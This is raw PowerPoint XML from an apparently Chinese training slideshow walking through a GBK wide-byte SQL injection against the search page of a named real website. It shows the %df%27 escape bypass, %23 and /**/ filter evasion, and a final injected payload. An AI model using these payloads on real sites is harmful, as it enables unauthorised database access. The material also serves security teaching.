            <a:endParaRPr lang="en-US" sz="1400"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xmlns="" val="2879380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SG" dirty="0" smtClean="0"/>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smtClean="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9DE80AA-0C34-42C3-AD3B-11AB3B80D392}" type="datetime1">
              <a:rPr lang="en-SG">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21/12/2016</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"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SG" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6758880" y="652026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B5CD8A2-17DD-477B-88E2-9F56A10AB6E6}" type="slidenum">
              <a:rPr lang="en-SG">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG" dirty="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1521570017"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483826" r:id="rId1"/>
    <p:sldLayoutId id="2147483835" r:id="rId2"/>
    <p:sldLayoutId id="2147483833" r:id="rId3"/>
    <p:sldLayoutId id="2147483834" r:id="rId4"/>
    <p:sldLayoutId id="2147483675" r:id="rId5"/>
    <p:sldLayoutId id="2147483832"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90" r:id="rId16"/>
    <p:sldLayoutId id="2147483692" r:id="rId17"/>
    <p:sldLayoutId id="2147483685" r:id="rId18"/>
  </p:sldLayoutIdLst>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr"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yiwulianhe.com/search.php?keywords=%df%27&amp;part=inform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5424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http://www.yiwulianhe.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG"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216287"/>
            <a:ext cx="8229600" cy="3290614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="399223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1539"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>合单引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>号时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>开发用过滤器规则在你的单引号前面加一个</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 这样就无法闭合单引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>号</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方法：可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>以在</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前输入</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df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，就</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>构成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>了 </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df</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经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>GBK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>解释器解码后就成为汉字，</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百度可查宽字节注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>)</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在输入</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df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> %27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编码时如下，将多的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>去掉</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
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2033688"/>
            <a:ext cx="8229600" cy="365581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444500"/>
            <a:ext cx="8229600" cy="2184399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>去掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后，页面（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>mySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>报错）恭喜你，成功的将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>出错信息暴露。</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en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.yiwulianhe.com/search.php?keywords=%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>df%27&amp;part=information</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en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句原型：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select * from table where id like(‘%XXX%’) ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>前一个单引号已关闭，如何关闭第一个括号？答：再加一个）即可 </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df</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单引号和括号都已经关闭了，如何把后面的注释掉呢？用</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后一定要用空格）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3170916"/>
            <a:ext cx="8229600" cy="13813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srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2476500"/>
            <a:ext cx="8496300" cy="2053309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190625" y="1181100"/>
            <a:ext cx="6561796" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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df</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经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>编码发现空格经过处理被去掉了，遗憾～～</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>怎么办？？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>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1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>试</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也</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>是注释</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>符</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但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编码，把＃去掉了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3089046"/>
            <a:ext cx="8229600" cy="154509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1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>试把＃换成％</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>23</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注入成功了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1877382"/>
            <a:ext cx="8229600" cy="396842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98661"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>这时就可以试着在注释符前插入注入语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>info()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>来构造伪</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>LIKE '%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>運</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>info()#%') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Info()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>前需要加连接符，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>and .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>空格符用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/**/ </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"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/**/and/**/ ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>%df%27)/**/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/**/info()%23</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
